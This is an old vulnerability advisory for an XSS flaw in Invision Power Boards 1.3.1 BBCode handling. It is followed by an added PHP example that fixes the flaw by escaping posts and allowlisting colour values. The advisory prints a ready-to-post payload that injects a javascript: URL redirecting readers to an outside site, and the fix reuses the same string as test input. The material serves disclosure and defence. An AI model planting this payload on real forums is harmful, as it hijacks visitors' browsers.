Invision Power Boards 1.3.1 FINAL XSS Exploit

2005-02-18T00:00:00
ID SECURITYVULNS:DOC:7859
Type securityvulns
Reporter Securityvulns
Modified 2005-02-18T00:00:00

Description

Description: Lack of checking in the SML codes.

Exploit: Put this into any signature or post on an Invision forum:

[COLOR=[IMG]http://aaa.aa/=`aaa.jpg[/IMG]]`style=background:url("javascript:document.location.replace('http://www.hackthissite.org');") [/color]

Fix: I'm not good at regexes :)
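One way to close this hole for the [color] tag, shown as an added example (not part of the original advisory and not Invision Power Board's own code): escape the whole post first, then convert only tags whose value is a plain colour name or hex code, so the nested [IMG] and the backtick and quote sequence in the string above stay inert text. The function name render_color and its regex are assumptions made for illustration.

```php
<?php
// Added example: allowlist rendering of a BBCode-style [color] tag.
// render_color() is a hypothetical helper, not Invision Power Board code.

function render_color(string $post): string
{
    // 1. Escape the entire post before any tag handling, so quotes and
    //    angle brackets typed by the user can never end up as live HTML.
    $safe = htmlspecialchars($post, ENT_QUOTES, 'UTF-8');

    // 2. Convert a tag only when its value is a colour name (letters only)
    //    or a #rgb / #rrggbb hex code. Any other value, including one that
    //    contains another tag, a backtick, a space or "style=", does not
    //    match and is left in the output as escaped literal text.
    return preg_replace_callback(
        '~\[color=([a-z]{3,20}|#[0-9a-f]{3}(?:[0-9a-f]{3})?)\](.*?)\[/color\]~is',
        function (array $m): string {
            // $m[1] passed the allowlist; $m[2] was escaped in step 1.
            return '<span style="color:' . strtolower($m[1]) . '">' . $m[2] . '</span>';
        },
        $safe
    );
}

// The string quoted in the advisory, kept verbatim in a nowdoc.
$advisory = <<<'BB'
[COLOR=[IMG]http://aaa.aa/=`aaa.jpg[/IMG]]`style=background:url("javascript:document.location.replace('http://www.hackthissite.org');") [/color]
BB;

// Constructed benign posts next to the advisory string.
$samples = [
    '[color=red]hello[/color]',
    '[color=#FF0000]hello[/color]',
    $advisory,
];

foreach ($samples as $s) {
    $html = render_color($s);
    // A converted tag produces a <span>; a rejected one stays plain text.
    $status = (strpos($html, '<span') !== false) ? 'converted' : 'left as text';
    echo $status, ': ', $html, "\n";
}
```

The same rule applies to every tag that copies a user-supplied value into an HTML attribute: validate the value against what the attribute may legitimately hold rather than trying to strip known-bad sequences.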